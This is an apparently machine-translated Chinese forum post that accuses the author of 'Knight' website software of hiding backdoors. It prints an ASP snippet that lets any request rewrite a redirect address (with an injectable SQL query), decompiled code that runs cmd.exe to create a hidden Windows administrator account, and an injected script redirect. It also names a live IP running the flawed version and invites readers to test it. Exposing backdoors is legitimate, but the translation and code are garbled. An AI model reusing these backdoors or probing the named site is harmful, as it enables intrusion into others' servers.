Warrior, can you say you're innocent?

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

Recently saw webmaster online a denunciation of the Knight Software article, estimated regardless of the article's right and wrong, I just want to from another angle to analyze the character of the Knight's author.
Knight 1.0 steals from search enemy
The reason is as follows: A little can read the ASP code, you can see the source of the search for the release of the program back door exists, the beginning of the code is as follows:

If Request ("Hm") <>0 Then


set Rs=server.createobject ("Adodb.recordset")


sql = "SELECT * from A where aid=" &request ("Hm")


Rs.Open sql,conn,1,3


rs ("tzurl") = Request ("Tzurl")


Response.Write "<script Language=javascript>alert" Operation success! Javascript:history.go ( -1);</script> "


rs.update


Rs.close


Response.End


End IF


meaning that as long as HM parameter is not 0 can be forced to modify the program jump address!


The same back door exists in the 1.0 version of the knight, interested friends can test themselves! Below is I found a Knight 1.0 station, offend this webmaster also please forgive! (http://61.157.109.6/)


Two, the Knight 2.0 to 4.5 all have the back door existence


in the latest release of version 4.5, using JSP writing, simple decompile software code, you can see such a section:


if (!) Cmd ". Equals (_$29.getattribute (" Cmdshell "))


break missing_block_label_2159;


AS2 = new String[3];


AS2;


as2[0] = "cmd.exe";


AS2;


JVM INSTR swap;


1;


"/C";


JVM INSTR Aastore;


JVM INSTR DUP;


JVM INSTR swap;


2;


"NET user AAA langh123!@# add";


JVM INSTR Aastore;


String as[];


as;


String as3[] = new STRING[3];


AS3;


as3[0] = "cmd.exe";


AS3;


JVM INSTR swap;


1;


"/C";


JVM INSTR Aastore;


JVM INSTR DUP;


JVM INSTR swap;


2;


"net localgroup Administrators Aaa/add";


JVM INSTR Aastore;


String as1[];


AS1;


runtime.getruntime (). exec (AS);


runtime.getruntime (). exec (AS1);





In addition in this new 4. 5 version of the software I also found a user's website to add code on the back door, the backdoor address for


Http://www.vnetpush.cn/push.asp?id=cpuid


in a user's web page I found in the loaded JS file content:


Document.writeln ("<script language=\" javascript\ ">");


Document.writeln ("self.location=\" Http:\/\/www-md5sdfs1df26x6s.sexaiai.com/dnschang_ 4b8ffe4e009a8c703f9590e694d5219f\ '; ');


Document.writeln ("<\/script>");





jump to a GG advertising station! Interested friends can go to track down ...





software is good or bad for the moment, just from the above two points can be seen the character of the chivalrous author has a problem! Warrior, do you dare to say that you are innocent?